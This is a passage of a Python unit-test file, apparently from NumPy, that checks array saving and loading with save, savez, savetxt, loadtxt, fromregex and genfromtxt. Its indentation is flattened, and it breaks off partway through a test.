if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
if sys.version_info[:2] >= (2, 7):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
# Fails with UnpicklingError: could not find MARK on Python 2.6
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
@np.testing.dec.skipif(not IS_64BIT, "Works only with 64bit systems")
@np.testing.dec.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
tmp = mktemp(suffix='.npz')
a = np.empty(L, dtype=np.uint8)
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a']
npfile.close()
os.remove(tmp)
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
fp = open(tmp, 'rb', 10000)
fp.seek(0)
assert_(not fp.closed)
_ = np.load(fp)['data']
assert_(not fp.closed)
# must not get closed by .load(opened fp)
fp.seek(0)
assert_(not fp.closed)
finally:
fp.close()
os.remove(tmp)
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
os.remove(tmp)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it.
# This needs to pass a file name to load for the
# test.
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
        # Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
class TestLoadTxt(TestCase):
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=np.int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, b'1 21\r3 42\r')
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
class Testfromregex(TestCase):
# np.fromregex expects files opened in binary mode.
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = TextIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
"Test retrieving a header"
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C': lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
